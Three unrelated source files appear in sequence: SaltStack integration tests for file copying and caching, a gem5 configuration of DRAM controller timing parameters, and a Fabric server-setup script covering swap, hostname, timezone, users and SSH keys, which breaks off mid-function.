self.assertIn('empty', os.listdir(os.path.join(tgt, 'grail')))
self.assertIn('scene', os.listdir(os.path.join(tgt, 'grail', '36')))
def test_get_dir_templated_paths(self):
'''
cp.get_dir
'''
tgt = os.path.join(integration.TMP, 'many')
self.run_function(
'cp.get_dir',
[
'salt://{{grains.script}}',
tgt.replace('many', '{{grains.alot}}')
]
)
self.assertIn('grail', os.listdir(tgt))
self.assertIn('36', os.listdir(os.path.join(tgt, 'grail')))
self.assertIn('empty', os.listdir(os.path.join(tgt, 'grail')))
self.assertIn('scene', os.listdir(os.path.join(tgt, 'grail', '36')))
def test_get_url(self):
'''
cp.get_url with salt:// source
'''
tgt = os.path.join(integration.TMP, 'scene33')
self.run_function(
'cp.get_url',
[
'salt://grail/scene33',
tgt,
])
with salt.utils.fopen(tgt, 'r') as scene:
data = scene.read()
self.assertIn('KNIGHT: They\'re nervous, sire.', data)
self.assertNotIn('bacon', data)
def test_get_url_https(self):
'''
cp.get_url with https:// source
'''
tgt = os.path.join(integration.TMP, 'test_get_url_https')
self.run_function(
'cp.get_url',
[
'https://repo.saltstack.com/index.html',
tgt,
])
with salt.utils.fopen(tgt, 'r') as instructions:
data = instructions.read()
self.assertIn('Bootstrap', data)
self.assertIn('Debian', data)
self.assertIn('Windows', data)
self.assertNotIn('AYBABTU', data)
def test_cache_file(self):
'''
cp.cache_file
'''
ret = self.run_function(
'cp.cache_file',
[
'salt://grail/scene33',
])
with salt.utils.fopen(ret, 'r') as scene:
data = scene.read()
self.assertIn('KNIGHT: They\'re nervous, sire.', data)
self.assertNotIn('bacon', data)
def test_cache_files(self):
'''
cp.cache_files
'''
ret = self.run_function(
'cp.cache_files',
[
['salt://grail/scene33', 'salt://grail/36/scene'],
])
for path in ret:
with salt.utils.fopen(path, 'r') as scene:
data = scene.read()
self.assertIn('ARTHUR:', data)
self.assertNotIn('bacon', data)
def test_cache_master(self):
'''
cp.cache_master
'''
ret = self.run_function(
'cp.cache_master',
)
for path in ret:
self.assertTrue(os.path.exists(path))
def test_cache_local_file(self):
'''
cp.cache_local_file
'''
src = os.path.join(integration.TMP, 'random')
with salt.utils.fopen(src, 'w+') as fn_:
fn_.write('foo')
ret = self.run_function(
'cp.cache_local_file',
[src])
with salt.utils.fopen(ret, 'r') as cp_:
self.assertEqual(cp_.read(), 'foo')
def test_list_states(self):
'''
cp.list_states
'''
ret = self.run_function(
'cp.list_states',
)
self.assertIn('core', ret)
self.assertIn('top', ret)
def test_list_minion(self):
'''
cp.list_minion
'''
self.run_function(
'cp.cache_file',
[
'salt://grail/scene33',
])
ret = self.run_function('cp.list_minion')
found = False
for path in ret:
if 'grail/scene33' in path:
found = True
self.assertTrue(found)
def test_is_cached(self):
'''
cp.is_cached
'''
self.run_function(
'cp.cache_file',
[
'salt://grail/scene33',
])
ret1 = self.run_function(
'cp.is_cached',
[
'salt://grail/scene33',
])
self.assertTrue(ret1)
ret2 = self.run_function(
'cp.is_cached',
[
'salt://fasldkgj/poicxzbn',
])
self.assertFalse(ret2)
def test_hash_file(self):
'''
cp.hash_file
'''
md5_hash = self.run_function(
'cp.hash_file',
[
'salt://grail/scene33',
])
path = self.run_function(
'cp.cache_file',
[
'salt://grail/scene33',
])
with salt.utils.fopen(path, 'r') as fn_:
self.assertEqual(
md5_hash['hsum'],
hashlib.md5(fn_.read()).hexdigest()
)
def test_get_file_from_env_predefined(self):
'''
cp.get_file
'''
tgt = os.path.join(integration.TMP, 'cheese')
try:
self.run_function('cp.get_file', ['salt://cheese', tgt])
with salt.utils.fopen(tgt, 'r') as cheese:
data = cheese.read()
self.assertIn('Gromit', data)
self.assertNotIn('Comte', data)
finally:
os.unlink(tgt)
def test_get_file_from_env_in_url(self):
tgt = os.path.join(integration.TMP, 'cheese')
try:
self.run_function('cp.get_file', ['salt://cheese?saltenv=prod', tgt])
with salt.utils.fopen(tgt, 'r') as cheese:
data = cheese.read()
self.assertIn('Gromit', data)
self.assertIn('Comte', data)
finally:
os.unlink(tgt)
def test_push(self):
log_to_xfer = os.path.join(tempfile.gettempdir(), 'salt-runtests.log')
try:
self.run_function('cp.push', log_to_xfer)
tgt_cache_file = os.path.join(
integration.TMP,
'master-minion-root',
'cache',
'minions',
'minion',
'files',
tempfile.gettempdir(),
'salt-runtests.log')
self.assertTrue(os.path.isfile(tgt_cache_file), 'File was not cached on the master')
finally:
os.unlink(tgt_cache_file)
if __name__ == '__main__':
from integration import run_tests
run_tests(CPModuleTest)
|
|
# Copyright (c) 2012-2014 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2013 Amin Farmahini-Farahani
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Andreas Hansson
# Ani Udipi
from m5.params import *
from AbstractMemory import *
# Enum for memory scheduling algorithms, currently First-Come
# First-Served and a First-Row Hit then First-Come First-Served
class MemSched(Enum): vals = ['fcfs', 'frfcfs']
# Enum for the address mapping. With Ch, Ra, Ba, Ro and Co denoting
# channel, rank, bank, row and column, respectively, and going from
# MSB to LSB. Available are RoRaBaChCo and RoRaBaCoCh, that are
# suitable for an open-page policy, optimising for sequential accesses
# hitting in the open row. For a closed-page policy, RoCoRaBaCh
# maximises parallelism.
class AddrMap(Enum): vals = ['RoRaBaChCo', 'RoRaBaCoCh', 'RoCoRaBaCh']
# Enum for the page policy, either open, open_adaptive, close, or
# close_adaptive.
class PageManage(Enum): vals = ['open', 'open_adaptive', 'close',
'close_adaptive']
# DRAMCtrl is a single-channel single-ported DRAM controller model
# that aims to model the most important system-level performance
# effects of a DRAM without getting into too much detail of the DRAM
# itself.
class DRAMCtrl(AbstractMemory):
type = 'DRAMCtrl'
cxx_header = "mem/dram_ctrl.hh"
# single-ported on the system interface side, instantiate with a
# bus in front of the controller for multiple ports
port = SlavePort("Slave port")
# the basic configuration of the controller architecture
write_buffer_size = Param.Unsigned(64, "Number of write queue entries")
read_buffer_size = Param.Unsigned(32, "Number of read queue entries")
# threshold in percent for when to forcefully trigger writes and
# start emptying the write buffer
write_high_thresh_perc = Param.Percent(85, "Threshold to force writes")
# threshold in percentage for when to start writes if the read
# queue is empty
write_low_thresh_perc = Param.Percent(50, "Threshold to start writes")
# minimum write bursts to schedule before switching back to reads
min_writes_per_switch = Param.Unsigned(16, "Minimum write bursts before "
"switching to reads")
# scheduler, address map and page policy
mem_sched_policy = Param.MemSched('frfcfs', "Memory scheduling policy")
addr_mapping = Param.AddrMap('RoRaBaChCo', "Address mapping policy")
page_policy = Param.PageManage('open_adaptive', "Page management policy")
# enforce a limit on the number of accesses per row
max_accesses_per_row = Param.Unsigned(16, "Max accesses per row before "
"closing");
# pipeline latency of the controller and PHY, split into a
# frontend part and a backend part, with reads and writes serviced
# by the queues only seeing the frontend contribution, and reads
# serviced by the memory seeing the sum of the two
static_frontend_latency = Param.Latency("10ns", "Static frontend latency")
static_backend_latency = Param.Latency("10ns", "Static backend latency")
# the physical organisation of the DRAM
device_bus_width = Param.Unsigned("data bus width in bits for each DRAM "\
"device/chip")
burst_length = Param.Unsigned("Burst lenght (BL) in beats")
device_rowbuffer_size = Param.MemorySize("Page (row buffer) size per "\
"device/chip")
devices_per_rank = Param.Unsigned("Number of devices/chips per rank")
ranks_per_channel = Param.Unsigned("Number of ranks per channel")
# default to 0 bank groups per rank, indicating bank group architecture
# is not used
# update per memory class when bank group architecture is supported
bank_groups_per_rank = Param.Unsigned(0, "Number of bank groups per rank")
banks_per_rank = Param.Unsigned("Number of banks per rank")
# only used for the address mapping as the controller by
# construction is a single channel and multiple controllers have
# to be instantiated for a multi-channel configuration
channels = Param.Unsigned(1, "Number of channels")
# timing behaviour and constraints - all in nanoseconds
# the base clock period of the DRAM
tCK = Param.Latency("Clock period")
# the amount of time in nanoseconds from issuing an activate command
# to the data being available in the row buffer for a read/write
tRCD = Param.Latency("RAS to CAS delay")
# the time from issuing a read/write command to seeing the actual data
tCL = Param.Latency("CAS latency")
# minimum time between a precharge and subsequent activate
tRP = Param.Latency("Row precharge time")
# minimum time between an activate and a precharge to the same row
tRAS = Param.Latency("ACT to PRE delay")
# minimum time between a write data transfer and a precharge
tWR = Param.Latency("Write recovery time")
# minimum time between a read and precharge command
tRTP = Param.Latency("Read to precharge")
# time to complete a burst transfer, typically the burst length
# divided by two due to the DDR bus, but by making it a parameter
# it is easier to also evaluate SDR memories like WideIO.
# This parameter has to account for burst length.
# Read/Write requests with data size larger than one full burst are broken
# down into multiple requests in the controller
# tBURST is equivalent to the CAS-to-CAS delay (tCCD)
# With bank group architectures, tBURST represents the CAS-to-CAS
# delay for bursts to different bank groups (tCCD_S)
tBURST = Param.Latency("Burst duration (for DDR burst length / 2 cycles)")
# CAS-to-CAS delay for bursts to the same bank group
# only utilized with bank group architectures; set to 0 for default case
# tBURST is equivalent to tCCD_S; no explicit parameter required
# for CAS-to-CAS delay for bursts to different bank groups
tCCD_L = Param.Latency("0ns", "Same bank group CAS to CAS delay")
# time taken to complete one refresh cycle (N rows in all banks)
tRFC = Param.Latency("Refresh cycle time")
# refresh command interval, how often a "ref" command needs
# to be sent. It is 7.8 us for a 64ms refresh requirement
tREFI = Param.Latency("Refresh command interval")
# write-to-read, same rank turnaround penalty
tWTR = Param.Latency("Write to read, same rank switching time")
# read-to-write, same rank turnaround penalty
tRTW = Param.Latency("Read to write, same rank switching time")
# rank-to-rank bus delay penalty
# this does not correlate to a memory timing parameter and encompasses:
# 1) RD-to-RD, 2) WR-to-WR, 3) RD-to-WR, and 4) WR-to-RD
# different rank bus delay
tCS = Param.Latency("Rank to rank switching time")
# minimum row activate to row activate delay time
tRRD = Param.Latency("ACT to ACT delay")
# only utilized with bank group architectures; set to 0 for default case
tRRD_L = Param.Latency("0ns", "Same bank group ACT to ACT delay")
# time window in which a maximum number of activates are allowed
# to take place, set to 0 to disable
tXAW = Param.Latency("X activation window")
activation_limit = Param.Unsigned("Max number of activates in window")
# Currently rolled into other params
######################################################################
# tRC - assumed to be tRAS + tRP
# A single DDR3-1600 x64 channel (one command and address bus), with
# timings based on a DDR3-1600 4 Gbit datasheet (Micron MT41J512M8) in
# an 8x8 configuration, amounting to 4 Gbyte of memory.
class DDR3_1600_x64(DRAMCtrl):
# 8x8 configuration, 8 devices each with an 8-bit interface
device_bus_width = 8
# DDR3 is a BL8 device
burst_length = 8
# Each device has a page (row buffer) size of 1 Kbyte (1K columns x8)
device_rowbuffer_size = '1kB'
# 8x8 configuration, so 8 devices
devices_per_rank = 8
# Use two ranks
ranks_per_channel = 2
# DDR3 has 8 banks in all configurations
banks_per_rank = 8
# 800 MHz
tCK = '1.25ns'
# 8 beats across an x64 interface translates to 4 clocks @ 800 MHz
tBURST = '5ns'
# DDR3-1600 11-11-11
tRCD = '13.75ns'
tCL = '13.75ns'
tRP = '13.75ns'
tRAS = '35ns'
tRRD = '6ns'
tXAW = '30ns'
activation_limit = 4
tRFC = '260ns'
tWR = '15ns'
# Greater of 4 CK or 7.5 ns
tWTR = '7.5ns'
# Greater of 4 CK or 7.5 ns
tRTP = '7.5ns'
# Default same rank rd-to-wr bus turnaround to 2 CK, @800 MHz = 2.5 ns
tRTW = '2.5ns'
# Default different rank bus delay to 2 CK, @800 MHz = 2.5 ns
tCS = '2.5ns'
# <=85C, half for >85C
tREFI = '7.8us'
# A single DDR3-2133 x64 channel refining a selected subset of the
# options for the DDR-1600 configuration, based on the same DDR3-1600
# 4 Gbit datasheet (Micron MT41J512M8). Most parameters are kept
# consistent across the two configurations.
class DDR3_2133_x64(DDR3_1600_x64):
# 1066 MHz
tCK = '0.938ns'
# 8 beats across an x64 interface translates to 4 clocks @ 1066 MHz
tBURST = '3.752ns'
# DDR3-2133 14-14-14
tRCD = '13.09ns'
tCL = '13.09ns'
tRP = '13.09ns'
tRAS = '33ns'
tRRD = '5ns'
tXAW = '25ns'
# A single DDR4-2400 x64 channel (one command and address bus), with
# timings based on a DDR4-2400 4 Gbit datasheet (Samsung K4A4G085WD)
# in an 8x8 configuration, amounting to 4 Gbyte of memory.
class DDR4_2400_x64(DRAMCtrl):
# 8x8 configuration, 8 devices each with an 8-bit interface
device_bus_width = 8
# DDR4 is a BL8 device
burst_length = 8
# Each device has a page (row buffer) size of 1 Kbyte (1K columns x8)
device_rowbuffer_size = '1kB'
# 8x8 configuration, so 8 devices
devices_per_rank = 8
# Use a single rank
ranks_per_channel = 1
# DDR4 has 2 (x16) or 4 (x4 and x8) bank groups
# Set to 4 for x4, x8 case
bank_groups_per_rank = 4
# DDR4 has 16 banks (4 bank groups) in all
# configurations. Currently we do not capture the additional
# constraints incurred by the bank groups
banks_per_rank = 16
# 1200 MHz
tCK = '0.833ns'
# 8 beats across an x64 interface translates to 4 clocks @ 1200 MHz
# tBURST is equivalent to the CAS-to-CAS delay (tCCD)
# With bank group architectures, tBURST represents the CAS-to-CAS
# delay for bursts to different bank groups (tCCD_S)
tBURST = '3.333ns'
# @2400 data rate, tCCD_L is 6 CK
# CAS-to-CAS delay for bursts to the same bank group
# tBURST is equivalent to tCCD_S; no explicit parameter required
# for CAS-to-CAS delay for bursts to different bank groups
tCCD_L = '5ns';
# DDR4-2400 17-17-17
tRCD = '14.16ns'
tCL = '14.16ns'
tRP = '14.16ns'
tRAS = '32ns'
# RRD_S (different bank group) for 1K page is MAX(4 CK, 3.3ns)
tRRD = '3.3ns'
# RRD_L (same bank group) for 1K page is MAX(4 CK, 4.9ns)
tRRD_L = '4.9ns';
tXAW = '21ns'
activation_limit = 4
tRFC = '260ns'
tWR = '15ns'
# Here using the average of WTR_S and WTR_L
tWTR = '5ns'
# Greater of 4 CK or 7.5 ns
tRTP = '7.5ns'
# Default same rank rd-to-wr bus turnaround to 2 CK, @1200 MHz = 1.666 ns
tRTW = '1.666ns'
# Default different rank bus delay to 2 CK, @1200 MHz = 1.666 ns
tCS = '1.666ns'
# <=85C, half for >85C
tREFI = '7.8us'
# A single DDR3 x64 interface (one command and address bus), with
# default timings based on DDR3-1333 4 Gbit parts in an 8x8
# configuration, which would amount to 4 GByte of memory. This
# configuration is primarily for comparing with DRAMSim2, and all the
# parameters except ranks_per_channel are based on the DRAMSim2 config
# file DDR3_micron_32M_8B_x8_sg15.ini. Note that ranks_per_channel has
# to be manually set, depending on size of the memory to be
# simulated. By default DRAMSim2 has 2048MB of memory with a single
# rank. Therefore for 4 GByte memory, set ranks_per_channel = 2
class DDR3_1333_x64_DRAMSim2(DRAMCtrl):
# 8x8 configuration, 8 devices each with an 8-bit interface
device_bus_width = 8
# DDR3 is a BL8 device
burst_length = 8
# Each device has a page (row buffer) size of 1KB
# (this depends on the memory density)
device_rowbuffer_size = '1kB'
# 8x8 configuration, so 8 devices
devices_per_rank = 8
# Use two ranks
ranks_per_channel = 2
# DDR3 has 8 banks in all configurations
banks_per_rank = 8
# 666 MHs
tCK = '1.5ns'
tRCD = '15ns'
tCL = '15ns'
tRP = '15ns'
tRAS = '36ns'
tWR = '15ns'
tRTP = '7.5ns'
# 8 beats across an x64 interface translates to 4 clocks @ 666.66 MHz.
# Note this is a BL8 DDR device.
tBURST = '6ns'
tRFC = '160ns'
# DDR3, <=85C, half for >85C
tREFI = '7.8us'
# Greater of 4 CK or 7.5 ns, 4 CK @ 666.66 MHz = 6 ns
tWTR = '7.5ns'
# Default same rank rd-to-wr bus turnaround to 2 CK, @666.66 MHz = 3 ns
tRTW = '3ns'
# Default different rank bus delay to 2 CK, @666.66 MHz = 3 ns
tCS = '3ns'
tRRD = '6.0ns'
tXAW = '30ns'
activation_limit = 4
# A single LPDDR2-S4 x32 interface (one command/address bus), with
# default timings based on a LPDDR2-1066 4 Gbit part in a 1x32
# configuration.
class LPDDR2_S4_1066_x32(DRAMCtrl):
# 1x32 configuration, 1 device with a 32-bit interface
device_bus_width = 32
# LPDDR2_S4 is a BL4 and BL8 device
burst_length = 8
# Each device has a page (row buffer) size of 1KB
# (this depends on the memory density)
device_rowbuffer_size = '1kB'
# 1x32 configuration, so 1 device
devices_per_rank = 1
# Use a single rank
ranks_per_channel = 1
# LPDDR2-S4 has 8 banks in all configurations
banks_per_rank = 8
# 533 MHz
tCK = '1.876ns'
# Fixed at 15 ns
tRCD = '15ns'
# 8 CK read latency, 4 CK write latency @ 533 MHz, 1.876 ns cycle time
tCL = '15ns'
# Pre-charge one bank 15 ns (all banks 18 ns)
tRP = '15ns'
tRAS = '42ns'
tWR = '15ns'
# 6 CK read to precharge delay
tRTP = '11.256ns'
# 8 beats across an x32 DDR interface translates to 4 clocks @ 533 MHz.
# Note this is a BL8 DDR device.
# Requests larger than 32 bytes are broken down into multiple requests
# in the controller
tBURST = '7.5ns'
# LPDDR2-S4, 4 Gbit
tRFC = '130ns'
tREFI = '3.9us'
# Irrespective of speed grade, tWTR is 7.5 ns
tWTR = '7.5ns'
# Default same rank rd-to-wr bus turnaround to 2 CK, @533 MHz = 3.75 ns
tRTW = '3.75ns'
# Default different rank bus delay to 2 CK, @533 MHz = 3.75 ns
tCS = '3.75ns'
# Activate to activate irrespective of density and speed grade
tRRD = '10.0ns'
# Irrespective of density, tFAW is 50 ns
tXAW = '50ns'
activation_limit = 4
# A single WideIO x128 interface (one command and address bus), with
# default timings based on an estimated WIO-200 8 Gbit part.
class WideIO_200_x128(DRAMCtrl):
# 1x128 configuration, 1 device with a 128-bit interface
device_bus_width = 128
# This is a BL4 device
burst_length = 4
# Each device has a page (row buffer) size of 4KB
# (this depends on the memory density)
device_rowbuffer_size = '4kB'
# 1x128 configuration, so 1 device
devices_per_rank = 1
# Use one rank for a one-high die stack
ranks_per_channel = 1
# WideIO has 4 banks in all configurations
banks_per_rank = 4
# 200 MHz
tCK = '5ns'
# WIO-200
tRCD = '18ns'
tCL = '18ns'
tRP = '18ns'
tRAS = '42ns'
tWR = '15ns'
# Read to precharge is same as the burst
tRTP = '20ns'
# 4 beats across an x128 SDR interface translates to 4 clocks @ 200 MHz.
# Note this is a BL4 SDR device.
tBURST = '20ns'
# WIO 8 Gb
tRFC = '210ns'
# WIO 8 Gb, <=85C, half for >85C
tREFI = '3.9us'
# Greater of 2 CK or 15 ns, 2 CK @ 200 MHz = 10 ns
tWTR = '15ns'
# Default same rank rd-to-wr bus turnaround to 2 CK, @200 MHz = 10 ns
tRTW = '10ns'
# Default different rank bus delay to 2 CK, @200 MHz = 10 ns
tCS = '10ns'
# Activate to activate irrespective of density and speed grade
tRRD = '10.0ns'
# Two instead of four activation window
tXAW = '50ns'
activation_limit = 2
# A single LPDDR3 x32 interface (one command/address bus), with
# default timings based on a LPDDR3-1600 4 Gbit part in a 1x32
# configuration
class LPDDR3_1600_x32(DRAMCtrl):
# 1x32 configuration, 1 device with a 32-bit interface
device_bus_width = 32
# LPDDR3 is a BL8 device
burst_length = 8
# Each device has a page (row buffer) size of 4KB
device_rowbuffer_size = '4kB'
# 1x32 configuration, so 1 device
devices_per_rank = 1
# Use a single rank
ranks_per_channel = 1
# LPDDR3 has 8 banks in all configurations
banks_per_rank = 8
# 800 MHz
tCK = '1.25ns'
# Fixed at 15 ns
tRCD = '15ns'
# 12 CK read latency, 6 CK write latency @ 800 MHz, 1.25 ns cycle time
tCL = '15ns'
tRAS = '42ns'
tWR = '15ns'
# Greater of 4 CK or 7.5 ns, 4 CK @ 800 MHz = 5 ns
tRTP = '7.5ns'
# Pre-charge one bank 15 ns (all banks 18 ns)
tRP = '15ns'
# 8 beats across a x32 DDR interface translates to 4 clocks @ 800 MHz.
# Note this is a BL8 DDR device.
# Requests larger than 32 bytes are broken down into multiple requests
# in the controller
tBURST = '5ns'
# LPDDR3, 4 Gb
tRFC = '130ns'
tREFI = '3.9us'
# Irrespective of speed grade, tWTR is 7.5 ns
tWTR = '7.5ns'
# Default same rank rd-to-wr bus turnaround to 2 CK, @800 MHz = 2.5 ns
tRTW = '2.5ns'
# Default different rank bus delay to 2 CK, @800 MHz = 2.5 ns
tCS = '2.5ns'
# Activate to activate irrespective of density and speed grade
tRRD = '10.0ns'
# Irrespective of size, tFAW is 50 ns
tXAW = '50ns'
activation_limit = 4
|
|
import re
import socket
import time
from fabric.context_managers import settings
from fabric.decorators import task
from fabric.network import disconnect_all
from fabric.state import env
from fabric.contrib.console import confirm
from fabric.contrib.files import exists, comment, append, uncomment
from fabric.operations import sudo, prompt, put, os, reboot
from fabric.utils import abort
from fabdeb.tools import print_green, print_yellow, print_red
__all__ = ('check_os', 'check_sudo', 'setup_swap', 'configure_hostname', 'configure_timezone', 'add_user',
'install_user_rsa_key', 'service_restart', 'server_reboot', 'update_locale')
SUPPORT_OS = (
# os issue, major versions, os name
('Debian GNU/Linux', ('8', '9'), 'Debian'),
)
OS_REPOSITORIES = {
'Debian': {
'8': (
'deb http://http.debian.net/debian jessie main contrib non-free\n'
'deb-src http://http.debian.net/debian jessie main contrib non-free\n'
'\n'
'deb http://http.debian.net/debian jessie-updates main contrib non-free\n'
'deb-src http://http.debian.net/debian jessie-updates main contrib non-free\n'
'\n'
'deb http://security.debian.org/ jessie/updates main contrib non-free\n'
'deb-src http://security.debian.org/ jessie/updates main contrib non-free\n'
),
'9': (
'deb http://deb.debian.org/debian stretch main contrib non-free\n'
'deb-src http://deb.debian.org/debian stretch main contrib non-free\n'
'\n'
'deb http://deb.debian.org/debian stretch-updates main contrib non-free\n'
'deb-src http://deb.debian.org/debian stretch-updates main contrib non-free\n'
'\n'
'deb http://security.debian.org/ stretch/updates main contrib non-free\n'
'deb-src http://security.debian.org/ stretch/updates main contrib non-free\n'
),
},
}
OS_REPOS_INSTALL_KEYS_COMMANDS = {}
def user_exists(username):
return exists('/home/{}'.format(username), use_sudo=True)
# # # COMMANDS # # #
@task
def check_os():
"""
Check OS supported by fabdeb
"""
if '_fd_checked_os_' in env:
return env._fd_checked_os_
print_green('INFO: Check your OS...')
remote_os_issue = sudo('cat /etc/issue', quiet=True)
if remote_os_issue.failed:
remote_os_issue = ''
remote_os_issue = remote_os_issue.replace('\\n', '').replace('\\l', '').strip()
remote_os_name = allow_versions = ok = None
if remote_os_issue:
for os_issue, versions, os_name in SUPPORT_OS:
if os_issue in remote_os_issue:
remote_os_name = os_name
allow_versions = versions
ok = True
break
if not ok:
abort('Your OS "{}" is not supported :('.format(remote_os_issue))
remote_os_ver = sudo('cat /etc/debian_version', quiet=True)
if remote_os_ver.failed:
remote_os_ver = ''
remote_os_ver = remote_os_ver.split('.', 1)[0].strip()
if remote_os_ver not in allow_versions:
abort('Your OS "{}" version "{}" is not supported :('.format(remote_os_issue, remote_os_ver))
print_green('INFO: Check your OS... OK')
env._fd_checked_os_ = remote_os_name, remote_os_ver
return env._fd_checked_os_
@task
def check_sudo():
"""
Check available sudo command
"""
if '_fd_checked_sudo_' in env:
return
print_green('INFO: Check sudo...')
t = sudo('whoami', quiet=True)
if t.failed:
print_red('NOTE: For using this fabfile you need to install sudo:\n'
' # aptitude install sudo\n'
'and add your non-root user to group sudo:\n'
' # adduser YourNonRootUserName sudo')
abort(t)
print_green('INFO: Check sudo... OK')
env._fd_checked_sudo_ = True
@task
def setup_swap():
"""
Setup SWAP and configure swappiness
"""
check_sudo()
check_os()
print_green('INFO: Setup SWAP...')
t = sudo('swapon -s', quiet=True)
if not re.search(r'\s\d+\s', t):
swap_size = int(prompt("Server doesn't have SWAP. Set size in MB to create SWAP. Keep 0 to skip.",
default='0', validate=r'\d+'))
if swap_size:
swap_fn = '/swapfile'
sudo('fallocate -l {size}M {sfn}'.format(size=swap_size, sfn=swap_fn))
command_defrag = 'e4defrag {sfn}'.format(sfn=swap_fn)
print_green('Defragmenting swap file: {}...'.format(command_defrag))
sudo(command_defrag, quiet=True)
sudo('chown root:root {sfn} && chmod 600 {sfn}'.format(sfn=swap_fn))
sudo('mkswap {sfn}'.format(sfn=swap_fn))
sudo('swapon {sfn}'.format(sfn=swap_fn))
append('/etc/fstab', '{sfn} swap swap defaults 0 0'.format(sfn=swap_fn), use_sudo=True)
swappiness_size = int(prompt("Set vm.swappiness parameter to /etc/sysctl.conf",
default='10', validate=r'\d+'))
append('/etc/sysctl.conf', 'vm.swappiness={}'.format(swappiness_size), use_sudo=True)
sudo('sysctl -p')
print_green('INFO: Setup SWAP... OK')
@task
def configure_hostname():
"""
Configure hostname, host ip, /etc/hosts
"""
check_sudo()
check_os()
print_green('INFO: Configure hostname...')
chn = sudo('cat /etc/hostname').strip()
nhn = prompt('Set hostname', default=chn, validate=r'[\w\.\-]+')
ip = prompt('Set host ip', default=socket.gethostbyname(env.host),
validate=r'^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$')
sudo('echo "{}" > /etc/hostname'.format(nhn))
comment('/etc/hosts', r'127.0.0.1', use_sudo=True)
comment('/etc/hosts', r'127.0.1.1', use_sudo=True, backup='')
append('/etc/hosts', '\n127.0.0.1\tlocalhost', use_sudo=True)
append('/etc/hosts', '127.0.1.1\t{}'.format(nhn.split('.')[0]), use_sudo=True)
append('/etc/hosts', '{}\t{}'.format(ip, nhn), use_sudo=True)
sudo('hostname -F /etc/hostname')
print_green('INFO: Configure hostname... OK')
@task
def configure_timezone():
"""
Configure timezone
"""
check_sudo()
check_os()
print_green('INFO: Configure timezone...')
current_tz = sudo('cat /etc/timezone', quiet=True).strip()
def validate_tz(tz):
tz = tz.strip()
fn = '/usr/share/zoneinfo/{}'.format(tz)
if ('.' not in tz and exists(fn, use_sudo=True) and
sudo('head -c 4 {}'.format(fn), quiet=True) == 'TZif'):
return tz
raise ValueError('Invalid timezone. See http://twiki.org/cgi-bin/xtra/tzdatepick.html')
new_timezone = prompt('Set timezone', default=current_tz, validate=validate_tz)
if current_tz != new_timezone:
sudo('timedatectl set-timezone {}'.format(new_timezone))
print_green('INFO: Configure timezone... OK')
@task
def add_user(username, py_ver='2', skip_confirm=False):
"""
Add new system user
"""
assert py_ver in ('2', '3')
check_sudo()
check_os()
if user_exists(username):
abort('User {} exists'.format(username))
if not skip_confirm:
if not confirm('Do you want to create new user?'):
return
print_green('INFO: Add system user "{}"...'.format(username))
sudo('adduser {}'.format(username))
uncomment('/home/{}/.bashrc'.format(username), r'#\s*force_color_prompt=yes', use_sudo=True)
from fabdeb.python import configure_virtualenvwrapper_for_user
configure_virtualenvwrapper_for_user(username, python_ver=py_ver)
from fabdeb.ftp import add_user_to_proftpd
add_user_to_proftpd(username)
print_green('INFO: Add system user "{}"... OK'.format(username))
@task
def install_user_rsa_key(username):
"""
Install RSA/SSH key for user
"""
check_sudo()
check_os()
if not user_exists:
abort('User {} noes not exist'.format(username))
if not confirm('Do you want set SSH key?'):
return
print_green('INFO: Set SSH key...')
print_yellow('Setup SSH key methods:\n'
'1: Generate new ~/.ssh/id_rsa key and manually add public key to remote servers.\n'
'2: Copy exists SSH RSA key from local to ~/.ssh/id_rsa.\n'
'3: Copy exists SSH RSA key from local to ~/.ssh/{keyname}.rsa and configure ~/.ssh/config.')
n = prompt('Select method', default='1', validate='[1-3]')
def file_exists_validator(fn):
fn = fn.replace('\\', '/')
if not os.path.exists(fn):
raise ValueError('File {} does not exist.'.format(fn))
return fn
with settings(sudo_user=username, user=username, group=username):
sudo('mkdir ~/.ssh', warn_only=True)
if n == '1':
with settings(sudo_user=username, user=username, group=username):
sudo('ssh-keygen -t rsa -b 2048 -f ~/.ssh/id_rsa')
sudo('chmod 600 ~/.ssh/id_rsa', warn_only=True)
pub = sudo('cat ~/.ssh/id_rsa.pub', quiet=True)
print_red('Add this public key to remote host:\n\n{}\n\n'.format(pub))
while not confirm('Did you do it?'):
pass
elif n == '2':
local_key_fn = prompt('Set path to RSA key in local (in windows skip part "C:")',
default='/home/yourusername/.ssh/id_rsa', validate=file_exists_validator)
put(local_key_fn, '/home/{}/.ssh/id_rsa'.format(username), use_sudo=True, mode=0o600)
sudo('chown {u}:{u} /home/{u}/.ssh/id_rsa'.format(u=username))
elif n == '3':
local_key_fn = prompt('Set path to RSA key in local (in windows skip part "C:")',
default='/home/yourusername/.ssh/id_rsa', validate=file_exists_validator)
